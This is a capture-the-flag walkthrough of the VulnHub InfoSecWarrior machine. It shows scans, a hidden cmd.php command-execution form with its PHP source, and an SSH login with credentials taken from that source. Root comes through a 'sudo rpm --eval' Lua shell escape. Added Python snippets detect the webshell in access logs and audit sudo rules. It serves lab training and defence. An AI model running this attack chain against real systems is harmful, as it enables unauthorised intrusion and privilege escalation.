Infosec Warrior
Target machine information
Name: InfoSecWarrior CTF 2020: 01
Address: https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:d5:a2:4d 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:d2:cf:be 1 60 PCS Systemtechnik GmbH
Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.216.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-02 05:54 EST
Nmap scan report for 192.168.56.216
Host is up (0.00037s latency).
Not shown: 65347 filtered tcp ports (no-response), 186 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2fb3a5cde51433a1823bdd5a5ed75936 (DSA)
|_ 2048 2db4152836d8b54e18818eaf3ee4dec1 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
MAC Address: 08:00:27:D2:CF:BE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.14 seconds
The Nmap scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.15 (CentOS) Server at 192.168.56.216 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2023-01-02 05:59:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Server may leak inodes via ETags, header found with file /sitemap.xml, inode: 264859, size: 292, mtime: Thu Feb 13 06:51:21 2020
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8743 requests: 18 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-01-02 06:00:15 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/02 06:01:02 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 1890 / 220561 (0.86%)[ERROR] 2023/01/02 06:01:02 [!] Get "http://192.168.56.216/webcam": read tcp 192.168.56.206:52706->192.168.56.216:80: read: connection reset by peer
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/02 06:01:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/02 06:01:30 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 77818 / 220561 (35.28%)[ERROR] 2023/01/02 06:02:02 [!] Get "http://192.168.56.216/understanding_t": read tcp 192.168.56.206:36771->192.168.56.216:80: read: connection reset by peer
Progress: 218689 / 220561 (99.15%)===============================================================
2023/01/02 06:03:37 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 06:15:02 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 287]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
/note.txt (Status: 200) [Size: 120]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/.html (Status: 403) [Size: 287]
Progress: 1323360 / 1323366 (100.00%)===============================================================
2023/01/02 06:28:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/wordpress/
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Database Error</title>
</head>
<body>
<h1>Error establishing a database connection</h1>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/note.txt
Note Form Developer Team
1. Try Harder
2. Enumeration is the key
Ping Us on @armourinfosec @MAALP1225 @CyberKnight00
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 07:32:26 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html (Status: 403) [Size: 296]
/.htaccess.js (Status: 403) [Size: 294]
/.htaccess.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd.txt (Status: 403) [Size: 295]
/.htaccess.sh (Status: 403) [Size: 294]
/.htpasswd.js (Status: 403) [Size: 294]
/.htaccess.php (Status: 403) [Size: 295]
/.htpasswd (Status: 403) [Size: 291]
/.htpasswd.html (Status: 403) [Size: 296]
/.htpasswd.sh (Status: 403) [Size: 294]
/.htpasswd.php (Status: 403) [Size: 295]
/cgi-bin/.html (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 290]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/note.txt (Status: 200) [Size: 120]
/sitemap.xml (Status: 200) [Size: 292]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 120805 / 122862 (98.33%)===============================================================
2023/01/02 07:33:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 07:33:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta.php (Status: 403) [Size: 290]
/.hta (Status: 403) [Size: 286]
/.hta.js (Status: 403) [Size: 289]
/.hta.sh (Status: 403) [Size: 289]
/.hta.html (Status: 403) [Size: 291]
/.hta.txt (Status: 403) [Size: 290]
/.htaccess.sh (Status: 403) [Size: 294]
/.htaccess.js (Status: 403) [Size: 294]
/.htaccess.html (Status: 403) [Size: 296]
/.htaccess.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 291]
/.htaccess.php (Status: 403) [Size: 295]
/.htpasswd.php (Status: 403) [Size: 295]
/.htpasswd.sh (Status: 403) [Size: 294]
/.htpasswd.js (Status: 403) [Size: 294]
/.htpasswd.html (Status: 403) [Size: 296]
/.htpasswd.txt (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 290]
/cgi-bin/.html (Status: 403) [Size: 295]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/note.txt (Status: 200) [Size: 120]
/sitemap.xml (Status: 200) [Size: 292]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 28052 / 28284 (99.18%)===============================================================
2023/01/02 07:33:57 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://infosecwarrior.com/sitemap/0.9">
<url>
<loc>http://infosecwarrior.com/index.htnl</loc>
<lastmod>2020-02-13</lastmod>
<changefreq>monthly</changefreq>
<priority>0.8</priority>
</url>
</urlset>
Look closely here: the sitemap entry is index.htnl, not index.html.
Requesting it:
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/index.htnl
<h1>Keep Calm And HACK</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="1280">
<img hidden="True" src="minnions.gif" alt="Hackor" height="640" width="1280">
<form action = "/cmd.php" hidden="True" method = "GET">
command
<input type = "text" name = "AI" value = "" maxlength = "100" />
<br />
<input type = "submit" value ="Submit" />
</form>
This hints at a form. Open the developer tools and delete the hidden="True" attributes; the page then shows a command-execution input box.
Entering id returns:
Now the main part what it is loooooool
Try other method
So the intended method is probably POST. Intercept the request with Burp Suite and change the request method:
The command now executes normally. Running cat cmd.php returns:
You Found ME : - (
";
echo "Try other method";
die;
}
if(isset($_POST['AI'])){
echo "You Found ME : - (";
echo "
";
$cmd = ($_POST['AI']);
system($cmd);
echo "
";
die;
}
else {
header("Location: https://www.armourinfosec.com/category/information-gathering/");
}
$user="isw0";
$pass="123456789blabla";
?>
A username and password were found:
username: isw0
password: 123456789blabla
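The access-log side of the cmd.php behaviour above, as an added example that is not part of the original walkthrough: a Python parser over constructed Apache access-log lines that flags requests which reached the parameter-handling branches of cmd.php. The path, the AI parameter name and the 302/200 behaviour come from the page; the log lines themselves are constructed.

```python
import re

# Apache access-log prefix (common/combined format, as used by Apache 2.2 on CentOS).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not from the original post), modelled on the walkthrough:
# a bare GET (302 redirect), a GET probe carrying AI=, then POSTs to cmd.php after
# the request method was switched in Burp Suite.
SAMPLE_LOG = """\
192.168.56.206 - - [02/Jan/2023:06:40:01 -0500] "GET /index.htnl HTTP/1.1" 200 312
192.168.56.1 - - [02/Jan/2023:06:40:03 -0500] "GET /cmd.php HTTP/1.1" 302 2
192.168.56.206 - - [02/Jan/2023:06:40:07 -0500] "GET /cmd.php?AI=id HTTP/1.1" 200 54
192.168.56.206 - - [02/Jan/2023:06:41:12 -0500] "POST /cmd.php HTTP/1.1" 200 96
192.168.56.206 - - [02/Jan/2023:06:41:40 -0500] "POST /cmd.php HTTP/1.1" 200 1180
192.168.56.1 - - [02/Jan/2023:06:42:00 -0500] "GET /wordpress/ HTTP/1.1" 200 241
"""

def parse_line(line):
    """Split one access-log line into fields, separating path from query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    rec["status"] = int(rec["status"])
    return rec

def find_webshell_hits(log_text, shell_path="/cmd.php", param="AI"):
    """Flag requests that reached the parameter branches of cmd.php: a bare
    request gets a 302, a request carrying AI= gets a 200, and only the POST
    branch calls system(), so a 200 on a POST most likely ran a command."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != shell_path or rec["status"] == 302:
            continue  # not the shell, or its default redirect branch (no parameter)
        if rec["method"] == "POST":
            reason = "POST reached the system() branch"
        elif param + "=" in rec["query"]:
            reason = "GET probe with %s= in the query string" % param
        else:
            reason = "non-redirect response without the known parameter"
        hits.append((rec["ip"], rec["method"], rec["status"], reason))
    return hits
```

Because POST bodies are not written to the access log, the 302-versus-200 distinction is what makes the hidden endpoint visible from the server side.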
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh isw0@192.168.56.216
Unable to negotiate with 192.168.56.216 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh isw0@192.168.56.216 -oHostKeyAlgorithms=+ssh-dss
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the DSA key sent by the remote host is
SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:15
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.56.216"
Host key for 192.168.56.216 has changed and you have requested strict checking.
Host key verification failed.
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.56.216"
# Host 192.168.56.216 found: line 14
# Host 192.168.56.216 found: line 15
/home/kali/.ssh/known_hosts updated.
Original contents retained as /home/kali/.ssh/known_hosts.old
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh isw0@192.168.56.216 -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '192.168.56.216 (192.168.56.216)' can't be established.
DSA key fingerprint is SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.216' (DSA) to the list of known hosts.
isw0@192.168.56.216's password:
Last login: Mon Feb 17 13:56:07 2020 from 192.168.56.1
[isw0@InfosecWarrior ~]$ id
uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[isw0@InfosecWarrior ~]$
Privilege escalation
[isw0@InfosecWarrior ~]$ sudo -l
Matching Defaults entries for isw0 on this host:
!visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE
LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User isw0 may run the following commands on this host:
(!root) NOPASSWD: /bin/bash
(root) /bin/ping, (root) /bin/ping6, (root) /bin/rpm, (root) /bin/ls, (root) /bin/mktemp
[isw0@InfosecWarrior ~]$ sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'
[sudo] password for isw0:
sh-4.1# cd /root
sh-4.1# ls -alh
total 56K
dr-xr-x---. 2 root root 4.0K Feb 14 2020 .
dr-xr-xr-x. 21 root root 4.0K Jan 2 16:21 ..
-rw-------. 1 root root 1.1K Feb 12 2020 anaconda-ks.cfg
-rwx------. 1 root root 65 Feb 14 2020 Armour.sh
lrwxrwxrwx. 1 root root 9 Feb 12 2020 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 May 20 2009 .bash_logout
-rw-r--r--. 1 root root 176 May 20 2009 .bash_profile
-rw-r--r--. 1 root root 176 Sep 23 2004 .bashrc
-rw-r--r--. 1 root root 100 Sep 23 2004 .cshrc
----------. 1 root root 33 Feb 13 2020 flag.txt
-rw-r--r--. 1 root root 8.3K Feb 12 2020 install.log
-rw-r--r--. 1 root root 3.4K Feb 12 2020 install.log.syslog
-rw-r--r--. 1 root root 129 Dec 4 2004 .tcshrc
sh-4.1# cat flag.txt
fc9c6eb6265921315e7c70aebd22af7e
sh-4.1#
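An added audit script, not from the original walkthrough, that parses a sudo -l listing like the one above and flags the rules that amount to a root shell or a password-less shell. The listing is a constructed copy of the page's output; the mapping of which commands are shell-capable is this example's own assumption.

```python
import re

# Commands from the sudoers entry on the page that hand out a shell when run via
# sudo. The reason strings are this example's own annotations, not page content.
SHELL_CAPABLE = {
    "/bin/bash": "an interactive shell",
    "/bin/rpm": "rpm --eval evaluates embedded Lua, which can call os.execute",
}

# Constructed copy of the 'sudo -l' listing shown in the walkthrough.
SAMPLE_SUDO_L = """\
User isw0 may run the following commands on this host:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ping, (root) /bin/ping6, (root) /bin/rpm, (root) /bin/ls, (root) /bin/mktemp
"""

# One entry: "(runas) [TAG: ...] command", possibly several per line, comma separated.
ENTRY_RE = re.compile(r'\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>[^\s,]+)')

def parse_sudo_l(text):
    """Return (runas, tags, command) triples from the 'may run' section."""
    entries, in_list = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_list = True
            continue
        if not in_list:
            continue  # skip the 'Matching Defaults entries' preamble
        for m in ENTRY_RE.finditer(line):
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            entries.append((m.group("runas"), tags, m.group("cmd")))
    return entries

def audit(entries):
    """Flag sudo rules that amount to a root shell or a password-less shell."""
    findings = []
    for runas, tags, cmd in entries:
        if runas.startswith("!"):
            findings.append((cmd, "negated Runas (%s): permitted as every account "
                                  "except the excluded one" % runas))
        if runas == "root" and cmd in SHELL_CAPABLE:
            findings.append((cmd, "root shell escape: " + SHELL_CAPABLE[cmd]))
        if "NOPASSWD" in tags and cmd in SHELL_CAPABLE:
            findings.append((cmd, "NOPASSWD on " + SHELL_CAPABLE[cmd]))
    return findings
```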
Lessons learned
- The directory scans had in fact already turned up sitemap.xml, but out of carelessness I took its entry for an ordinary index.html and ignored it; it was actually index.htnl, and missing that blocked further progress.